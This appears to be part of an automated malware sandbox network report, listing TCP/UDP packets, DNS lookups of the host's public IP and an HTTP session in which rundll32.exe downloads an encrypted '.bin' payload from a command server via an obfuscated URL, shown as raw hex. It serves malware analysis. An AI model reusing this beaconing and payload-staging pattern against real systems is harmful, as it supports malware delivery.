Apr 22, 2022 16:17:42.947956085 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947978020 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947983027 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.947997093 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948016882 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948020935 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.948038101 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948056936 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948072910 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.948077917 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948096991 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948103905 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.948117018 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948133945 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948152065 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948153973 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.948168039 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948184013 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948199987 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.948200941 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948218107 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948219061 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.948235035 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948251009 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948255062 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.948266983 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948283911 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948286057 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.948299885 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948318005 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948323965 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.948333979 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948349953 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948358059 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.948365927 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948381901 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948391914 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.948399067 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948415041 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948424101 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.948438883 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948456049 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948457003 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.948473930 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948487043 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.948489904 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948506117 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948523045 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948539972 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948543072 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.948556900 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.948592901 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.948693991 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:43.019150019 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019190073 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019210100 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019229889 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019248962 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019252062 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:43.019267082 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019274950 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:43.019287109 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019305944 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019318104 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:43.019324064 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019332886 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:43.019342899 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019354105 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:43.019361973 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019380093 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:43.019380093 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019398928 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019406080 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:43.019418955 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019437075 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019444942 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:43.019455910 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019474030 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019480944 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:43.019493103 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019505024 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:43.019511938 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019529104 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019541025 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:43.019550085 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019578934 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:43.019578934 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019598007 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019603968 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:43.019617081 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019635916 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019654036 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019670963 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019689083 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019707918 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019726992 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019743919 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019763947 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.019769907 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:43.019792080 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:43.019879103 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:43.089855909 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.089925051 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.089956999 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.089984894 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.090012074 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.090040922 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.090068102 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.090095997 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.090096951 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:43.090123892 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.090150118 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.090188980 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:43.090208054 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:43.090209007 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:43.092597961 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:43.114130020 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:43.114218950 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:43.460293055 CEST	49844	80	192.168.2.6	67.43.234.14
Apr 22, 2022 16:17:43.569874048 CEST	80	49844	67.43.234.14	192.168.2.6
Apr 22, 2022 16:17:43.570007086 CEST	49844	80	192.168.2.6	67.43.234.14
Apr 22, 2022 16:17:43.570158958 CEST	49844	80	192.168.2.6	67.43.234.14
Apr 22, 2022 16:17:43.678391933 CEST	80	49844	67.43.234.14	192.168.2.6
Apr 22, 2022 16:17:44.208116055 CEST	80	49844	67.43.234.14	192.168.2.6
Apr 22, 2022 16:17:44.208281040 CEST	49844	80	192.168.2.6	67.43.234.14
Apr 22, 2022 16:17:54.461703062 CEST	49844	80	192.168.2.6	67.43.234.14
Apr 22, 2022 16:17:54.462208033 CEST	49846	80	192.168.2.6	67.43.234.14
Apr 22, 2022 16:17:54.570235014 CEST	80	49844	67.43.234.14	192.168.2.6
Apr 22, 2022 16:17:54.570271969 CEST	80	49846	67.43.234.14	192.168.2.6
Apr 22, 2022 16:17:54.570348978 CEST	49844	80	192.168.2.6	67.43.234.14
Apr 22, 2022 16:17:54.570569038 CEST	49846	80	192.168.2.6	67.43.234.14
Apr 22, 2022 16:17:54.570586920 CEST	49846	80	192.168.2.6	67.43.234.14
Apr 22, 2022 16:17:54.570643902 CEST	49846	80	192.168.2.6	67.43.234.14
Apr 22, 2022 16:17:54.678917885 CEST	80	49846	67.43.234.14	192.168.2.6
Apr 22, 2022 16:17:54.679055929 CEST	49846	80	192.168.2.6	67.43.234.14
Apr 22, 2022 16:17:54.682344913 CEST	80	49846	67.43.234.14	192.168.2.6
Apr 22, 2022 16:17:54.682475090 CEST	49846	80	192.168.2.6	67.43.234.14
Apr 22, 2022 16:17:54.682925940 CEST	80	49846	67.43.234.14	192.168.2.6
Apr 22, 2022 16:17:54.683027029 CEST	49846	80	192.168.2.6	67.43.234.14
Apr 22, 2022 16:17:54.787523985 CEST	80	49846	67.43.234.14	192.168.2.6
Apr 22, 2022 16:17:54.787646055 CEST	49846	80	192.168.2.6	67.43.234.14
Apr 22, 2022 16:17:54.801655054 CEST	80	49846	67.43.234.14	192.168.2.6
Apr 22, 2022 16:17:54.801707029 CEST	80	49846	67.43.234.14	192.168.2.6
Apr 22, 2022 16:17:54.801800966 CEST	49846	80	192.168.2.6	67.43.234.14
Apr 22, 2022 16:17:54.801876068 CEST	80	49846	67.43.234.14	192.168.2.6
Apr 22, 2022 16:17:54.896047115 CEST	80	49846	67.43.234.14	192.168.2.6
Apr 22, 2022 16:17:54.910188913 CEST	80	49846	67.43.234.14	192.168.2.6
Apr 22, 2022 16:17:54.910382986 CEST	80	49846	67.43.234.14	192.168.2.6
Apr 22, 2022 16:17:54.910613060 CEST	80	49846	67.43.234.14	192.168.2.6
Apr 22, 2022 16:17:55.727977991 CEST	80	49846	67.43.234.14	192.168.2.6
Apr 22, 2022 16:17:55.730197906 CEST	49846	80	192.168.2.6	67.43.234.14
Apr 22, 2022 16:17:55.825753927 CEST	49846	80	192.168.2.6	67.43.234.14
Apr 22, 2022 16:17:55.934154034 CEST	80	49846	67.43.234.14	192.168.2.6
Apr 22, 2022 16:17:56.469044924 CEST	80	49846	67.43.234.14	192.168.2.6
Apr 22, 2022 16:17:56.469221115 CEST	49846	80	192.168.2.6	67.43.234.14
Apr 22, 2022 16:17:57.449640989 CEST	49846	80	192.168.2.6	67.43.234.14
Apr 22, 2022 16:17:57.449678898 CEST	49846	80	192.168.2.6	67.43.234.14
Apr 22, 2022 16:17:57.558108091 CEST	80	49846	67.43.234.14	192.168.2.6
Apr 22, 2022 16:17:57.558132887 CEST	80	49846	67.43.234.14	192.168.2.6
Apr 22, 2022 16:17:58.082153082 CEST	80	49846	67.43.234.14	192.168.2.6
Apr 22, 2022 16:17:58.082310915 CEST	49846	80	192.168.2.6	67.43.234.14
Apr 22, 2022 16:18:43.415285110 CEST	49848	80	192.168.2.6	67.43.234.37
Apr 22, 2022 16:18:43.523629904 CEST	80	49848	67.43.234.37	192.168.2.6
Apr 22, 2022 16:18:43.523751020 CEST	49848	80	192.168.2.6	67.43.234.37
Apr 22, 2022 16:18:43.523910046 CEST	49848	80	192.168.2.6	67.43.234.37
Apr 22, 2022 16:18:43.632261038 CEST	80	49848	67.43.234.37	192.168.2.6
Apr 22, 2022 16:18:44.161041021 CEST	80	49848	67.43.234.37	192.168.2.6
Apr 22, 2022 16:18:44.161118031 CEST	49848	80	192.168.2.6	67.43.234.37
Apr 22, 2022 16:18:47.876908064 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:18:47.877003908 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:19:03.084470034 CEST	80	49846	67.43.234.14	192.168.2.6
Apr 22, 2022 16:19:03.084523916 CEST	49846	80	192.168.2.6	67.43.234.14

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 22, 2022 16:16:47.683815002 CEST	58801	53	192.168.2.6	8.8.8.8
Apr 22, 2022 16:16:47.700845957 CEST	53	58801	8.8.8.8	192.168.2.6
Apr 22, 2022 16:16:47.706826925 CEST	58802	53	192.168.2.6	208.67.222.222
Apr 22, 2022 16:16:47.722929955 CEST	53	58802	208.67.222.222	192.168.2.6
Apr 22, 2022 16:16:47.724766016 CEST	58803	53	192.168.2.6	208.67.222.222
Apr 22, 2022 16:16:47.740904093 CEST	53	58803	208.67.222.222	192.168.2.6
Apr 22, 2022 16:16:47.785564899 CEST	58804	53	192.168.2.6	208.67.222.222
Apr 22, 2022 16:16:47.801620960 CEST	53	58804	208.67.222.222	192.168.2.6
Apr 22, 2022 16:17:46.441162109 CEST	49464	53	192.168.2.6	8.8.8.8
Apr 22, 2022 16:17:46.459058046 CEST	53	49464	8.8.8.8	192.168.2.6
Apr 22, 2022 16:17:46.460344076 CEST	49465	53	192.168.2.6	8.8.8.8
Apr 22, 2022 16:17:46.476351976 CEST	53	49465	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 22, 2022 16:16:47.683815002 CEST	192.168.2.6	8.8.8.8	0x420c	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Apr 22, 2022 16:16:47.706826925 CEST	192.168.2.6	208.67.222.222	0x1	Standard query (0)	222.222.67.208.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 22, 2022 16:16:47.724766016 CEST	192.168.2.6	208.67.222.222	0x2	Standard query (0)	myip.opendns.com	A (IP address)	IN (0x0001)
Apr 22, 2022 16:16:47.785564899 CEST	192.168.2.6	208.67.222.222	0x3	Standard query (0)	myip.opendns.com	28	IN (0x0001)
Apr 22, 2022 16:17:46.441162109 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 22, 2022 16:17:46.460344076 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	1.0.0.127.in-addr.arpa	PTR (Pointer record)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 22, 2022 16:16:47.700845957 CEST	8.8.8.8	192.168.2.6	0x420c	No error (0)	resolver1.opendns.com		208.67.222.222	A (IP address)	IN (0x0001)
Apr 22, 2022 16:16:47.722929955 CEST	208.67.222.222	192.168.2.6	0x1	No error (0)	222.222.67.208.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Apr 22, 2022 16:16:47.722929955 CEST	208.67.222.222	192.168.2.6	0x1	No error (0)	222.222.67.208.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Apr 22, 2022 16:16:47.722929955 CEST	208.67.222.222	192.168.2.6	0x1	No error (0)	222.222.67.208.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Apr 22, 2022 16:16:47.740904093 CEST	208.67.222.222	192.168.2.6	0x2	No error (0)	myip.opendns.com		102.129.143.53	A (IP address)	IN (0x0001)
Apr 22, 2022 16:17:46.459058046 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Apr 22, 2022 16:17:46.476351976 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	1.0.0.127.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)

HTTP Request Dependency Graph

146.70.35.138

193.56.146.148

67.43.234.14

67.43.234.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49750	146.70.35.138	80	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Apr 22, 2022 16:15:21.968986988 CEST	339	OUT	GET /phpadmin/O5VHv_2BomBJ/FDSQ3C_2FEh/d3AB91pB2zVZZc/V8xBUftmx0M_2Bqnngedi/DpLLDhwUKQDOSSQS/nVaNzwxkqgcnJXK/SQy2RrteBXCJGPusj_/2Fou9gPbn/TEfuPZW_2FR5wp1JKvFc/BRr_2Bgc4Sh6fwKpLbg/92QNhdYG6IBsInIDDSBHis/CLBmXrf7shSlX/Qy4n9fNl/nE2maUEbSwiaPEHMkNYQxQk/D1KSQzl_2F/HXQWBGmfgthfPqv/9SK.src HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 146.70.35.138 Connection: Keep-Alive Cache-Control: no-cache
Apr 22, 2022 16:15:22.344774961 CEST	341	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Apr 2022 14:15:22 GMT Content-Type: application/octet-stream Content-Length: 185492 Connection: keep-alive Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="6262b87a4bf22.bin" Data Raw: 2c d4 68 ba 77 fa c2 de fe 95 8f 63 f1 45 56 5f 12 44 e4 30 5c f8 d2 eb ea 34 2c 15 08 e7 49 45 b8 f9 96 19 41 71 13 28 e7 22 8f 4d ba 44 b3 a3 6f 7b bf 72 ac b8 4f 7a 8f 60 a9 cb 6c 3d ef 2b e9 4b 6b 0d c8 68 41 c2 6d c2 e3 f9 cf c2 87 b7 ba 24 d1 5f c4 e4 11 7f 1c c7 6e f2 5e f5 c4 ad f7 ba 0b 19 f0 08 a6 0c 8c d6 7a ca 0e d2 e6 b9 3c 29 08 fd f9 f1 34 77 36 0b 69 d0 eb 4a 15 78 00 41 ee 63 8f 39 c4 83 84 54 5b 93 be 4b 41 ed 1d 77 6d c3 05 cd fb 5a 9e 69 00 27 b2 f8 28 22 b7 a6 fc e9 96 12 bf 16 16 9d 0b ee d7 ea 0d 29 ee 79 d6 f3 cc 9f 0b f5 7d b6 d6 9d bb 69 9e 76 c7 39 32 ee d6 d4 08 12 34 be c8 8e fb 1c 3d 89 fc bf 1e 9e 0e d2 b9 e2 14 bf 51 43 7d 58 21 d1 40 02 45 f3 45 af bc 93 a8 36 96 14 02 27 44 48 1d 0b 1f 08 60 72 20 55 8d 5f 3f 8c 71 71 8c e7 54 2b e2 cf f6 8d 2a df b4 82 9c 87 a5 18 0b 6f fb 3f 82 4c 5e aa 5a 08 af 9c 02 00 fb eb 9d d7 2f 90 11 fd 78 12 69 5c e2 38 4c 8c 6d 27 2d 35 3c 88 16 b7 9f 54 8f a5 4e e1 4b ea ff cb 25 a4 42 ea d4 1e 22 32 a7 6b d6 eb b7 2b c0 80 ad 13 44 6c 89 82 1e 7b 2c b0 71 05 65 75 d4 16 90 f9 f6 9e bf 21 86 69 02 07 a7 b5 02 b3 ec 6e 19 59 91 77 0a cd c7 f9 cf d0 06 50 8f db ab 03 f0 2b ed 2c e9 89 4a 88 59 8e 9c 7b de 14 fb 5f 7a df 0b 56 a9 b0 09 ba 19 86 1e 08 0f 71 f0 8e 65 83 4b a6 05 af 86 29 8c 39 c9 e2 36 a1 a4 0b 31 39 3a ee 98 85 08 ef f9 8a c4 bb ec bb 1f 9b 9f f4 c6 01 ad 17 12 ae cc 8a 29 41 89 52 e5 85 3e 09 15 69 93 24 9e f2 0d ae 0e 90 3c 47 2b 74 cd 39 1f dc 18 32 2f e0 00 8c d0 28 0e 13 d1 70 db 15 39 da 20 14 8b e0 b8 1b 3c 02 e0 b2 a5 3c ca fe e7 fb 71 b2 bc 46 2d bc b4 9e 2c 4d 42 51 60 d9 48 e0 73 ba b2 e6 ff cc b8 db 2e e2 47 db bb 09 3a b9 9f 21 fe 77 2e 1d b2 85 0d a1 6a 4b 3e 56 67 a8 28 25 b1 f2 cf ad c9 e6 f4 18 51 6f b6 b0 8a 87 9d fb ce 15 d9 a2 86 b4 13 c6 dd e0 49 26 f1 50 24 7d 04 14 ea d1 2d 24 e9 a6 f4 22 05 98 d9 91 38 e1 02 fb 62 5c 43 30 a0 74 a0 fe 8a 61 5b a4 5f 98 c5 39 06 b3 ff b3 25 3e 04 88 b4 82 83 94 64 a9 84 cb 9f 9f 1f 70 bf a6 3d 99 30 75 a2 26 ad af ef f7 ba 7e 13 36 dd ec 5b 00 93 21 74 eb 71 3e 31 3f 16 27 12 09 56 f4 b7 72 7d 36 19 03 2a 7c a9 f7 0e db 60 ea 21 0c ac 34 69 0b f0 81 dc 2d 5f e4 a4 b6 24 55 e6 24 ff de 1c d5 e9 18 d3 35 2a 51 65 b0 c5 0f d5 01 1b 9a a0 5e 93 f9 68 c7 00 64 1f 2c 80 f7 41 5f e5 a0 9d 2f c6 86 8f 6f 8b 9d 4c b1 75 fc 20 25 d0 69 a5 8d 42 8d 70 8d 86 c2 f3 67 47 48 b7 50 67 56 93 04 87 a8 94 6f b6 e3 87 a3 b4 4d 82 29 55 55 cc bf 88 0f b6 e6 4e 07 85 85 7b fd 4d fd 55 f7 b8 74 b1 8b 37 53 df fb 4f 98 6d 65 18 3a 85 dd 02 aa 7b f8 75 8a 02 bd 0a 6a 66 4a 19 f0 33 ea 01 93 bf 2a 36 65 f8 7e ef 26 c4 af a9 2e 18 c8 ed b3 86 8f 46 e9 a7 e4 ec 13 e5 6d 9b c1 09 49 cc 98 5f b5 0a 69 9d 1c e3 cc c3 38 81 ac 51 37 ad b2 6c 2f 7d 59 19 40 d7 7e f1 53 45 02 45 53 44 6c 2d 0d c7 9a 76 0c 41 e9 e0 e3 e8 77 65 0c 72 10 fe 62 87 ff 9f c1 11 34 4f a6 32 7d 9d 57 30 b5 40 b5 bb f8 5b 1b 7b 6f 92 b8 55 ce df 06 0e ce dd 7e ac 10 7e fd 5b dd 43 a7 d8 02 48 aa 68 37 27 8b 94 13 39 6a 48 27 0b 97 37 5f 35 45 41 33 2d 34 0a Data Ascii: ,hwcEV_D0\4,IEAq("MDo{rOz`l=+KkhAm$_n^z<)4w6iJxAc9T[KAwmZi'(")y}iv924=QC}X!@EE6'DH`r U_?qqT+o?L^Z/xi\8Lm'-5<TNK%B"2k+Dl{,qeu!inYwP+,JY{_zVqeK)9619:)AR>i$<G+t92/(p9 <<qF-,MBQ`Hs.G:!w.jK>Vg(%QoI&P$}-$"8b\C0ta[_9%>dp=0u&~6[!tq>1?'Vr}6\|`!4i-_$U$5Qe^hd,A_/oLu %iBpgGHPgVoM)UUN{MUt7SOme:{ujfJ36e~&.FmI_i8Q7l/}Y@~SEESDl-vAwerb4O2}W0@[{oU~~[CHh7'9jH'7_5EA3-4
Apr 22, 2022 16:15:22.344825983 CEST	342	IN	Data Raw: 99 10 85 d7 1c 36 c0 22 ad c0 17 04 e7 d3 51 71 d3 71 24 6b 45 10 29 ad 03 0b 02 01 45 c4 ab 56 6a f7 03 ce 9d fc 36 9f 85 a2 31 5f 0d d6 6f 5a ec 99 18 9c 24 ce 53 b8 da 14 8e 41 1d 91 bf 2c c5 fb 1a 56 3b 1b 0b f1 9f c1 36 cc 1b a4 06 c6 7a 6b Data Ascii: 6"Qqq$kE)EVj61_oZ$SA,V;6zkv,O`~b.`3And/HH6/4l-#q*&inEf-Yx[?@8efjUr=e^>kVVG)Hz#shtEsl)
Apr 22, 2022 16:15:22.344877958 CEST	343	IN	Data Raw: 1b c9 fe f8 47 fb 52 9b 80 32 24 7b 2d 18 cb 6c 0a 3a b7 e1 ff 5f 83 97 96 a5 35 d8 f7 5e a7 79 ea b3 a1 2f 09 24 81 c3 1b 1e 99 b1 3b 2d 0f 09 98 85 62 dd 7f f9 f9 70 57 67 9d 78 9f f9 ac 13 77 74 cc 43 fd 65 c1 c6 c1 56 79 23 b7 4a 81 e1 41 d0 Data Ascii: GR2${-l:_5^y/$;-bpWgxwtCeVy#JA Vx\|R+n+eN(S;4)s.GP`!DCNN>?R$3P$zVfw;}6@\|)qW'a]Wx~$=c
Apr 22, 2022 16:15:22.344908953 CEST	345	IN	Data Raw: 9d 8c 0f 29 e5 7d 63 0a 47 79 84 ab f5 f0 d6 c4 2e 40 df eb 8c e8 d1 cd 25 f4 39 de 92 3c 2e c3 ba 68 fb aa db 11 cc 83 9a cc 82 f3 08 e6 66 80 66 f6 92 6b 98 98 ad d8 b4 9f c9 bd 34 3e 60 b8 ae 98 a9 a3 db 3d 17 5b 68 03 62 38 59 22 16 59 3c 73 Data Ascii: )}cGy.@%9<.hffk4>`=[hb8Y"Y<s0)e:W*kP;e1tPuL76a7I=%?r\|QMoEr9_#sm>s_\C_zz8#-"C<1qQi!x[nYUz]X&\f
Apr 22, 2022 16:15:22.344960928 CEST	346	IN	Data Raw: a3 98 5a d2 94 4f 6f 88 7b 3c 06 aa e1 bd 17 09 5d 19 3f 04 53 48 0f f7 44 12 25 75 27 c2 60 11 1d cb 77 fe 3e cd 5d 0a 26 c8 d5 c3 87 9b 28 54 56 36 1e a0 92 76 90 8c 6b d0 50 44 e9 fc b5 0a e2 60 71 ae ab 48 1e 82 82 1e 8f 7d 9f c4 96 12 46 39 Data Ascii: ZOo{<]?SHD%u'`w>]&(TV6vkPD`qH}F9WZCk(`:_,n=D(p[0%r)4"F1@(WtDZn'M'#Azl\|47r\|)u5DPfh\|*{9Plu1XX
Apr 22, 2022 16:15:22.344995022 CEST	347	IN	Data Raw: 0c 0f 24 67 57 7e 5f 76 36 98 51 a8 14 f1 c9 e3 f7 a2 6e 23 41 07 5a 7f ee 5a 4e ec 41 10 0f 56 8a 7c 52 fb f9 73 55 03 0f 28 5d 2e 32 56 5b 25 f5 6e 70 c1 25 e2 eb 80 be 71 11 d0 72 3f 5b 0a ec a8 57 df 2f ac 65 51 5f 86 d8 41 af 08 88 c3 92 1d Data Ascii: $gW~_v6Qn#AZZNAV\|RsU(].2V[%np%qr?[W/eQ_A[C4Rhr3~4!zc)CQp:iLHIJC9gqM`d$!V@?!^#u9e=KrldHQ,=C~vB.W
